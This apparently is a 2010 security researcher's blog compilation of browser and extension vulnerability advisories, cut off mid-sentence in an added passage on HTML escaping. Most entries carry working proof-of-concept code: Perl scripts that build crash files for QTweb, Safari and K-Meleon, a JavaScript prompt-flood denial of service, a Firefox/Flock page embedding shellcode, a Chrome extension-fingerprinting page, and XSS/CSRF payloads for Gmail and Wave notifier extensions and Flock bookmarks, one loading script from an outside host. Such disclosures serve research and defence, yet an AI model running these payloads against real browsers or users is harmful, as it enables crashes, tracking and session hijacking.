QTweb browser for windows 3.7(Build 063) CSS Denial of Service

Wednesday, December 08, 2010
#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisory: http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notified: NO   Exploit available: YES
##########################################################

QTweb browser for Windows is prone to a denial of service
condition. An attacker can exploit this issue to crash the
affected browser, effectively denying service to
legitimate users.

The following are vulnerable:

QTweb for windows 3.7(Build 063)


###########
Sample PoC
###########

Generate the crash file with the script below and open it with the QTweb browser: the browser hangs and after around one minute it crashes with an abnormal program termination.

#########################################################################
# Title: QTweb browser for windows 3.7(Build 063) CSS Denial of Service PoC
# Vendor: http://www.qtweb.net/
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
use strict;
use warnings;

# Writes an HTML file whose stylesheet carries a property value of about 40 MB
my $file = "Crash_QTweb.html";
my $junk = "A/" x 20000016;
open(my $FILE, '>', $file) or die "Cannot write $file: $!";
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
close($FILE);
print "\nCrash_QTweb.html File Created successfully\n";

############################# EOF ############################

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....

Safari for windows 5.0.2(7533.18.5) CSS Denial of Service

#########################################################
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisory: http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notified: NO   Exploit available: YES
##########################################################

Safari for Windows is prone to a denial of service
condition. An attacker can exploit this issue to crash the
affected browser, effectively denying service to
legitimate users.

The following are vulnerable:

safari for windows 5.0.2(7533.18.5)


###########
Sample PoC
###########

Generate the crash file with the script below and open it with Safari: the browser hangs and after around one minute it crashes
with an abnormal program termination.

#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
use strict;
use warnings;

# Writes an HTML file whose stylesheet carries a property value of about 40 MB
my $file = "Crash_safari.html";
my $junk = "A/" x 20000000;
open(my $FILE, '>', $file) or die "Cannot write $file: $!";
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
close($FILE);
print "\nCrash_safari.html File Created successfully\n";

############################# EOF ############################


Google Chrome Installed extensions arbitrary detection

Tuesday, September 07, 2010
######################################################
Google Chrome Installed extensions arbitrary detection
Vendor URL: http://www.google.com
Advisory: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notified: YES   Vendor confirmed: YES   Exploit: YES
######################################################

Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is it to use extensions?
An attacker can access extension resources via an iframe (at this moment I
have not found a way to alter information from extensions).

For example:
<iframe src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"></iframe>

A remote user can also modify a web document and reference the extension with
a "base" meta tag in a malformed document:

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">

So I think the chrome-extension handler needs sanitization so that external
web pages cannot access internal resources (file:/// and other protocol
handlers are safe to use and do not give access to internal resources from
external web documents).

So the chrome-extension protocol handler can be used to find out which
extensions are installed in the client browser, and if any extension is
vulnerable to something, this information can be used to exploit that extension.

Extensions can be detected in incognito mode too.

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
</head>
<body>
<!-- each img points at a resource shipped with a known extension; onLoad fires only if the extension is installed -->
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have installed Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have installed My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have installed Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have installed Webpage Screenshot</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have installed Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have installed Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Timeline
##############

Discovered: 27 May 2010
Vendor notified: 01 Jun 2010
Vendor patch: 02 Sep 2010
Disclosure: 07 Sep 2010

####################### END ########################

Thanks to Climbo for his patience and support.


Safari for windows Invalid SVG text style Webkit.dll DoS

Monday, August 30, 2010
###################################################
Safari for windows Invalid SVG text style Webkit.dll DoS
Vendor URL: www.apple.com
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notified: Yes   Exploit available: YES
###################################################

Safari browser for Windows is prone to a denial of
service condition. This issue affects webkit.dll and causes a
crash when Safari tries to render an SVG image with a very long
font-size text style.



############
Versions
############

Safari for Windows 5.0.1 (7533.17.8)
on Windows 7 Ultimate fully patched.


Safari for Windows 5.0.1 (7533.17.8)
on Windows XP Home SP3 fully patched


############
Timeline
############

Discovered: 19-08-2010
Vendor notified: 25-08-2010
Vendor response: 26-08-2010
Disclosure: 30-09-2010

####################
Proof Of Concept
####################

Save this code as image.svg and open it with Safari. Note that
I have added some "extra" pixels to the font-size text style.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# End ###############

Thanks to Climbo for his patience and support.


Flock Browser 3.0.0.3989 Malformed Bookmark XSS

Thursday, August 19, 2010
#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisory: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notified: NO   Exploits available: YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends. This browser version (3.0.0.3989) is based on an old
Chromium project.


Flock has a flaw that allows cross-site scripting style attacks.
In bookmarks there is a persistent XSS via a malformed bookmark title,
triggered when importing a malformed bookmark from another browser, when
adding a new malformed bookmark, or when importing a bookmark HTML file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
     It will be read and overwritten.
     DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>

#####################EOF##################

It is a persistent script injection: when the user clicks the menu to view
the favorites page or accesses the favorites URL directly, the injected script "defaces" that page and the user can no longer access the favorites :)
( URL of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

################# End #######################


Google Chrome and Chrome frame Prompt DoS

Monday, August 16, 2010
###############################################
Google Chrome and Chrome frame Prompt DoS
Vendor URL: http://www.google.com
Advisory: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advisory (Spanish): http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notified: YES   Exploit available: YES
###############################################

This bug was discovered by me, and I have tested and
investigated it with Climbo from #ayuda-informaticos
on the irc-hispano network.

#########
Abstract
#########

Sometimes web applications need to prompt users for some data;
they can prompt via JavaScript code or via HTML forms.

In the case of JavaScript prompts, what happens if
the data to prompt (the question) is very long?

################

Google Chrome is prone to a denial of service
condition via "alert prompts" when the data passed to them is very long.

I don't know if this can be turned into remote code execution or
memory corruption with some heap spray or similar, but I think
it needs to be analyzed and patched.


###################
Versions Tested
###################

In all cases Chrome is the vector used to do
something on every system :)


######################
MAC OS X leopard 10.5
######################

Google Chrome 5.0.375.126 (Official Build 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome windows (Chrome crash).


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In all cases Chrome is minimized and blocks access to the
window manager buttons, and we cannot switch between the
applications we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Official Build 49890)
on Windows 7 Ultimate fully patched.

It causes a DoS in Chrome, and a DoS in IE8 when
exploited through Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Official Build 55113) dev, WebKit 534.3
V8 2.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

In all cases Debian closes all Chrome windows (Chrome crash).


####################
Proof Of Concepts
####################

This PoC is for testing on Win7 32 bits with Chrome, and
with Chrome Frame in conjunction with IE8, where it causes
a DoS in IE8.

#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

This second PoC is for testing on Linux or Mac OS X.

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

############
References
############
Related vuln:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### End ###################

Thanks to Climbo for his patience and support.


Safari for windows Long link DoS

Wednesday, August 04, 2010
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified: Yes   Exploit available: YES
############################################

Safari is prone to a DoS with a very long link.
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and freezes, resulting in a denial of service condition.

#################
Versions Tested
#################

I have tested this issue on Win XP SP3 and on a fully patched Windows 7.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
References
############

Discovered: 29-07-2010
Vendor notified: 31-07-2010
Vendor response:
Vendor patch:

####################
Proof Of Concept
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file, open it with Safari and wait a few seconds
######################################################################

use strict;
use warnings;

my $archivo = $ARGV[0];
if (!defined($archivo)) {
    print "Usage: $0 <archivo.html>\n";
    exit 1;
}

my $cabecera = "<html>" . "\n";
# link whose about:neterror 'c' parameter is about 1 MB of slashes
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
my $fin = "</html>";

my $datos = $cabecera . $payload . $fin;

# open the output file for writing and dump the page into it
open(my $FILE, '>', $archivo) or die "Cannot write $archivo: $!";
print $FILE $datos;
close($FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Vendor bugtracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Possibly related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### End #############################

Thanks to Phreak for his support and for helping me understand the nature of this bug;
thanks to jajoni for testing it on the Windows 7 x64 version.


K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified: Yes   Exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone to crashing with a very long URL.
Internal web pages like about:neterror do not limit the number of
characters that a user can put in the 'c' and 'd' params, so if we compose a
malformed URL the browser can easily be crashed. This issue is exploitable
via web links like click here, or via
window.location.replace('very long url') or similar vectors.

#################
Versions Tested
#################

I have tested this issue on Win XP SP3 and on a fully patched Windows 7.

Win XP SP3:
K-Meleon 1.5.3 & 1.5.4 vulnerable (crashes)
K-Meleon 1.6.0a4 vulnerable (crashes)

Windows 7 Ultimate:
K-Meleon 1.5.3 & 1.5.4 vulnerable (crashes)
K-Meleon 1.6.0a4 vulnerable (crashes)

############
References
############

Discovered: 29-07-2010
Vendor notified: 31-07-2010
Vendor response:
Vendor patch:

########################
ASM code stack overflow
########################

################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file, open it with K-Meleon, click the link and wait a few seconds
######################################################################

use strict;
use warnings;

my $archivo = $ARGV[0];
if (!defined($archivo)) {
    print "Usage: $0 <archivo.html>\n";
    exit 1;
}

my $cabecera = "<html>" . "\n";
# link whose about:neterror 'c' parameter is about 1 MB of slashes
my $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
my $fin = "</html>";

my $datos = $cabecera . $payload . $fin;

# open the output file for writing and dump the page into it
open(my $FILE, '>', $archivo) or die "Cannot write $archivo: $!";
print $FILE $datos;
close($FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Vendor bugtracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Possibly related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### End #############################

Thanks to Phreak for his support and for helping me understand the nature of this bug;
thanks to jajoni for testing it on the Windows 7 x64 version.


IE8 On windows 7 32 bits unspecified DoS

Tuesday, July 13, 2010
##########################################
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisory: http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor notified: YES   Vendor confirmed: YES
EXPLOIT: Private
###########################################

A possible flaw exists in Internet Explorer 8
on Windows 7 32-bit that can cause a remote
denial of service from a malformed web page.

This issue is triggered when IE8 tries to render a
modal app prompt in conjunction with third-party apps that
use resources from IE8 and try to render text inputs;
it is possibly a bug in the GDI text-rendering
APIs, or the DrawText() functions are involved.

When the victim visits a malformed web page and closes the second
app, that app becomes unstable and needs to close, and then
when IE8 tries to restore the tab it loses the focus from the
application, and the result is a denial of service for that window,
because we can't click on any bar or any button or do any action
in that window; IE8 is apparently frozen.

After several tests this issue is only reproducible on Win7 32 bits.

I have an exploit or PoC for this issue, but it's
private at this time :)

Solution:
Microsoft regards this as a stability bug and has added it
for consideration in a future version.

#################### End ##########################

Thanks for your time !!!

Google Services Notifier Chrome extension XSS/CSRF

Friday, June 18, 2010
######################################
Google Services Notifier Chrome extension XSS/CSRF
Extension: https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
Advisory: http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html
Exploit available: yes   Vendor notified: NO
#######################################

So in this case "Notifier for Google Wave Chrome"
has a flaw that allows attackers to perform XSS-style attacks.

All extensions run in their own origin, and there is no way to alter data from the extension
or get sensitive data such as the email account or password, etc.

If we look at how many users have installed this extension =>
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
109 users have installed it (WoW)

############
Explanation
############

Google Services Notifier lets users see when they have a new wave and
view a preview of it.

"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,
Google Docs, Google Wave etc. More services will be added soon."

If an attacker composes a new mail with HTML or JavaScript code in the
subject and sends it to the victim, the code is executed when the victim clicks
the extension to view a preview of the mail.

So to exploit it we need to compose a "special" mail.
For example, if we put an iframe directly in the mail subject, like
"><iframe src="javascript:alert(location.href);"></iframe>
the alert is executed when the extension tries to preview the mail :)
It is executed in a context where the location.href value is
"about:blank".

For example, send a mail with a Google Wave logout action in the body:
"><iframe src="https://wave.google.com/wave/logout"></iframe>
It closes the session on Google Wave; this is a CSRF.

###################### End #################################

Thanks for your time !!!

Notifier for Google Wave Chrome extension XSS/CSRF

######################################
Notifier for Google Wave Chrome extension XSS/CSRF
Extension: https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
Advisory: http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html
Exploit available: yes   Vendor notified: NO
#######################################

So in this case "Notifier for Google Wave Chrome"
has a flaw that allows attackers to perform XSS-style attacks.

All extensions run in their own origin, and there is no way to alter data from the extension
or get sensitive data such as the email account or password, etc.

If we look at how many users have installed this extension =>
https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
56,542 users have installed it (WoW)

############
Explanation
############

Notifier for Google Wave lets users see when they have a new wave and
view a preview of it.

If an attacker composes a new wave with HTML or JavaScript code in the
body and sends it to the victim, the code is executed when the victim clicks
the extension to view a preview of the wave.

So to exploit it we need to compose a "special" wave.
For example, if we put an iframe directly in the wave body, like
"><iframe src="javascript:alert(location.href);"></iframe>
the alert is executed when the extension tries to preview the wave :)
It is executed in a context where the location.href value is
"about:blank".

For example, send a wave with a Google Wave logout action in the body:
"><iframe src="https://wave.google.com/wave/logout"></iframe>
It closes the session on Google Wave; this is a CSRF.

###################### End #################################

Thanks for your time !!!


Gmail Checker plus Chrome extension XSS/CSRF II

Thursday, June 17, 2010
######################################
Gmail Checker plus Chrome extension XSS/CSRF II
Extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
Advisory: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html
Exploit available: yes   Vendor notified: NO
#######################################

So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)
has a flaw that allows attackers to perform XSS-style attacks.

All extensions run in their own origin, and there is no way to alter data from the extension
or get sensitive data such as the email account or password, etc.

If we look at how many users have installed this extension =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303,711 users have installed it (WoW)

############
Explanation
############

Google Mail Checker Plus lets users see when they have new mail and
view a preview of the mail.

If an attacker composes a new mail with HTML or JavaScript code in the mail
body and sends it to the victim, the code is executed when the victim clicks
the extension to view a preview of the mail.

So to exploit it we need to compose a "special" mail.
For example, if we put an iframe directly in the mail body, like
"><iframe src="javascript:alert(location.href);"></iframe>
the extension shows this code as plain text and the alert is not executed.
So we need to use a Gmail feature (auto-converting links into clickable URLs):
we can compose an email body with an http link like
http://"><iframe src="javascript:alert(location.href);"></iframe>
or compose a mail link like:
lalala@"><iframe src="javascript:alert(location.href);"></iframe>.com
In both cases the alert is executed when the extension tries to preview
the email :) It is executed in a context where the location.href value is
"about:blank".


Gmail is a safe place, but the extensions used to manage it can be a potential
attack vector.

For example, send an email with a Gmail logout action in the body:
http://"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>
It closes the session on Gmail; this is a CSRF.
Also, if the user has enabled the option to show desktop notifications, the iframe is executed in the desktop notification window too, and it can cause a denial of service of the extension, for example when the victim tries to change any option in the extension's options page :P

We have discussed it in http://code.google.com/p/chromium/issues/detail?id=45401
The developer has released a patched version in trunk for other issues that I disclosed before;
see the references for the previous vulns => OSVDB ID: 65459 and OSVDB ID: 65460
previous patch =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
and see diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

I release this as 0-day without notifying the vendor because
for the previous issues he patched the vulns without
making any reference to them, stealing credit for the discovery.
So I release these new vulns without notifying the developer :)


UPDATED: Now the extension's about section reflects the vulnerability and credits it to me :)



###################### End #################################

Thanks for your time !!!


Gmail Checker plus Chrome extension XSS

Thursday, June 03, 2010
######################################
Gmail Checker plus Chrome extension XSS
Extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
Advisory: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit available: yes
#######################################

So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)
has a flaw that allows attackers to perform XSS-style attacks.

All extensions run in their own origin, and there is no way to alter data from the extension or get sensitive data such as the email account or password, etc.

If we look at how many users have installed this extension =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303,711 users have installed it (WoW)

############
Explanation
############

Google Mail Checker Plus lets users see when they have new mail and
view a preview of the mail.

If an attacker composes a new mail with HTML or JavaScript code in the subject form field and sends it to the victim, the code is executed when the victim clicks the extension to view the mail, and when the victim accepts the alert and views a preview of the mail the iframe is executed too.

Gmail is a safe place, but the extension used to manage it can be a potential
vector to attack it.

For example, send an email with a Gmail logout action in the subject:
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>
It closes the session on Gmail; this is a XSRF, and
it is executed in a context where the location.href value is "about:blank".

We have discussed it in http://code.google.com/p/chromium/issues/detail?id=45401
The developer has released a patched version in trunk =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
Please download it and copy it to your extension folder to solve it.

See Diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

######################€nd#################################

Thanks for your time!!!


Firefox 3.6.2 & 3.6.3 and Flock 2.5 browsers uncaught exception DoS

Friday, April 09, 2010
##################################
Firefox 3.6.2 & 3.6.3 and Flock 2.5 browsers uncaught exception
error console DoS
Vendor URL: http://www.mozilla.com
Vendor URL: http://www.flock.com/
Advisory: http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################

Firefox and Flock can hang on a malformed page, and when the user
tries to open the Error Console, Firefox and Flock crash
due to an uncaught exception; this is an out-of-memory
error.


################
Versions
################

Firefox 3.6.2 and 3.6.3: vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228

Flock 2.5: vulnerable


#################
Proof of Concept
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); -->
<!-- Shellcode calc.exe but does not work -->
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
<center><h1> Bad 'throw' exception Remote DoS on Firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affect Flock and Firefox.
Remember to press Ctrl+Shift+J and make sure that your console log is on the "All" tab or the "Errors" tab in Firefox and Flock :)</h3>

</center></body>
</html>



###################€nd ##########################

Thanks to Estrella for being my light

Flock browser marquee tag DoS

Thursday, April 01, 2010
############################################
Flock browser marquee tag DoS
Advisory: http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html
############################################


The Flock browser contains a flaw that may allow a remote denial of service.
The issue is triggered when a victim visits a specially crafted web page
containing a large number of marquee HTML tags, resulting in a loss of
availability (DoS) for the browser and possible memory corruption.

This bug was first discovered by '599eme Man flouf@live.fr'; this is
extended research on it. He found it in these browsers:
Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1

and I tested it in:

Flock Browser 1.2.6: vulnerable
Flock Browser 2.5: vulnerable

Sample code can be found/downloaded here =>
http://www.exploit-db.com/exploits/11347

########################€nd ###################

Thanks to Estrella for being my light

Webmatic 3.0.3 Multiple cross-site scripting

Friday, March 19, 2010
#################################
Webmatic 3.0.3 Multiple cross-site scripting
Vendor URL: http://www.valarsoft.com/
Advisory: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html
Vendor notified: YES
#################################

Webmatic contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables and form fields upon
submission to the 'index.php' script. This could allow a
user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.


##############
Versions
##############

Valarsoft Webmatic 3.0.3

It is possible that prior versions
are affected


################
Timeline
##############

Discovered: 13-01-2010
Vendor notified: 14-03-2010
Vendor response: 15-03-2010
Disclosure: 19-03-2010

###############
Private messages
################

The subject form field is vulnerable.

An attacker can compose a PM with a malformed title,
and it is executed when the victim views their inbox
or opens the PM.


#################
Forums
#################

The search form field, the 'filter' variable
and the title form field are affected.

An attacker can compose a post with a malformed title,
and when a victim tries to browse the forum the XSS is
executed; the attacker can also compose a search URL
with XSS in the 'filter' variable, or put the XSS in the
search form field, to execute it.

##################
Chat room
###################

The nickname form field is affected.

An attacker can use a malformed nickname containing XSS, and
when they join a channel the XSS is executed for all of the
channel's users.

######################
News
####################

The title form field is affected.

An attacker can compose a news item with a malformed title, and
when a user browses the news section the XSS is executed;
also, if the news item has a summary ("resume") on the home page,
all users who load the page are affected by the XSS.

The 'pg' variable is affected.

An attacker can compose a malformed URL in the news section and
insert XSS code in the 'pg' variable; when a victim clicks
this URL the XSS is executed.

#########################
banners section
#########################

The title and label form fields are affected.

A remote user can add a banner
with a malformed title and/or a malformed label;
when the attacker visits their banner, the XSS is executed
in their own banner management page.
Also, if a victim visits this banner the XSS is executed.
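Both the Mail Checker Plus issue above and every Webmatic field in this advisory come down to the same defect: attacker-controlled text (a mail subject, a PM or forum title, a nickname, a news title, a banner label) is written into HTML without encoding. The following JavaScript is an added example, not code from either project, showing the vulnerable concatenation beside an output-encoded version, plus the textContent assignment an extension should use instead of innerHTML; the function names and the sample subject (the logout-iframe payload quoted in the Mail Checker Plus post) are constructed for this illustration.

```javascript
// Added example (not from Mail Checker Plus or Webmatic): encode untrusted text
// before it reaches HTML. Runs under Node.js without a DOM.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can close a double- or single-quoted
// attribute or start a new element. Everything else passes through unchanged.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the untrusted subject is concatenated straight into
// markup, in both an attribute context and a text context. A subject that
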